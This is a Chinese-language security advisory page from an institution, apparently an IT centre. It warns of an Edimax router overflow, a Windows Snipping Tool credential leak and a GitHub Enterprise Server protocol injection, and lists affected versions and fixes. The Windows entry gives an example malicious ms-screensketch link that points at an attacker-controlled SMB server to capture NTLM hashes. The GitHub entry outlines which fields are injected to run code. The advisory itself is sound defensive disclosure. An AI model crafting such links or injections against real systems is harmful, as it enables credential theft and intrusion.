首页

预警信息

当前您的位置: 首页 -> 预警信息 -> 正文

【风险预警】近期网络安全风险预警(23)

发布日期:2026-05-14   浏览量:

一、Edimax 路由器缓冲区溢出风险

    Edimax(爱迪麦斯)是台湾讯舟科技的小型办公无线路由器,常用于办公共享宽带上网。

1. 风险内容

  远程攻击者通过 WAN 设置接口(/goform/setWAN)操纵 pptpDfGateway 等参数触发栈缓冲区溢出,可导致拒绝服务(DoS)或潜在远程代码执行(RCE)。

2. 影响范围   

    Edimax BR-6208AC <= 1.02
    BR-6428nC <= 1.16

3. 修复建议

 联系信息中心获取版本更新链接。

二、Windows 截图工具欺骗风险

      Windows 截图工具(Snipping Tool)是 Windows 系统自带的轻量级屏幕捕获工具,用于日常办公、学习中快速截取、标注并分享屏幕内容。

1. 风险内容

  Windows 截图工具在处理自定义 URI 协议 ms-screensketch时存在输入验证缺陷。该应用注册的深层链接允许通过 filePath参数指定远程文件路径。由于未对参数值进行充分校验,当用户访问恶意构造的链接(例如 ms-screensketch:edit?filePath=\\攻击者控制的 SMB 服务器\image.png)时,截图工具会尝试建立 SMB 连接以访问远程资源,从而在用户无感知的情况下发起 NTLM 身份认证协商,导致当前用户的 Net-NTLM 哈希凭据泄露至攻击者控制的服务器。成功利用此漏洞可造成凭据中继或离线破解风险,攻击常借助社会工程学诱导用户点击伪装链接触发。

2. 影响范围  

  Windows 11:

    Version 26H1 < 10.0.28000.1836

    Version 25H2 < 10.0.26200.8246

    Version 24H2 < 10.0.26100.8246

    Version 23H2 < 10.0.22631.6936

    Windows 10:

    Version 22H2 < 10.0.19045.7184

    Version 21H2 < 10.0.19044.7184

    Version 1809 < 10.0.17763.8644

    Version 1607 < 10.0.14393.9060

    Windows Server:

    Windows Server 2025 < 10.0.26100.32690

    Windows Server 2022, 23H2 < 10.0.25398.2274

    Windows Server 2022 < 10.0.20348.5020

    Windows Server 2019 < 10.0.17763.8644

    Windows Server 2016 < 10.0.14393.9060

    Windows Server 2012 R2 < 6.3.9600.23132

    Windows Server 2012 < 6.2.9200.26026

3. 修复建议

  方法一.使用 Windows Update 更新

自动更新:Microsoft Update 默认启用,当系统检测到可用更新时,将会自动下载更新并在下一次启动时安装。

  手动更新:

1.点击“开始菜单”或按 Windows 快捷键,点击进入“设置”。

2.选择“更新和安全”,进入“Windows 更新”。

3.选择“检查更新”,等待系统将自动检查并下载可用更新。

4.重启计算机,安装更新。系统重新启动后,可通过进入“Windows 更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新,可以点击该更新名称进入微软官方更新描述链接,点击最新的 SSU 名称并在新链接中点击“Microsoft 更新目录”,然后在新链接中选择适用于目标系统的补丁进行下载并安装。

  方法二. 手动安装补丁

Microsoft 官方下载相应补丁进行更新。

三、GitHub X-Stat 协议注入导致远程代码执行风险

    GitHub Enterprise Server 是私有化部署的企业级代码托管与协作平台,用于企业内网管控代码资产、研发协作。

1. 风险内容该漏洞源于 babeld 代理在处理 git push 选项时,未对分号(;等特殊定界符进行有效转义,直接将其嵌入内部 X-Stat 协议头中。由于该协议采用“末尾写入获胜(Last-write-wins)”的语义,攻击者可注入恶意字段覆盖 rails_envcustom_hooks_dir 关键安全配置。通过将环境篡改为非生产模式并重定向钩子目录,攻击者可诱导 pre-receive hook 执行受控的任意二进制文件,从而在GitHub.com 共享存储节点或GHES服务器上实现 git 用户权限的代码执行。

2. 影响范围  

    3.14.0 <= GitHub Enterprise Server < 3.14.25

    3.15.0 <= GitHub Enterprise Server < 3.15.20

    3.16.0 <= GitHub Enterprise Server < 3.16.16

    3.17.0 <= GitHub Enterprise Server < 3.17.13

    3.18.0 <= GitHub Enterprise Server < 3.18.7

    3.19.0 <= GitHub Enterprise Server < 3.19.4

3. 修复建议

 联系信息中心获取版本更新链接。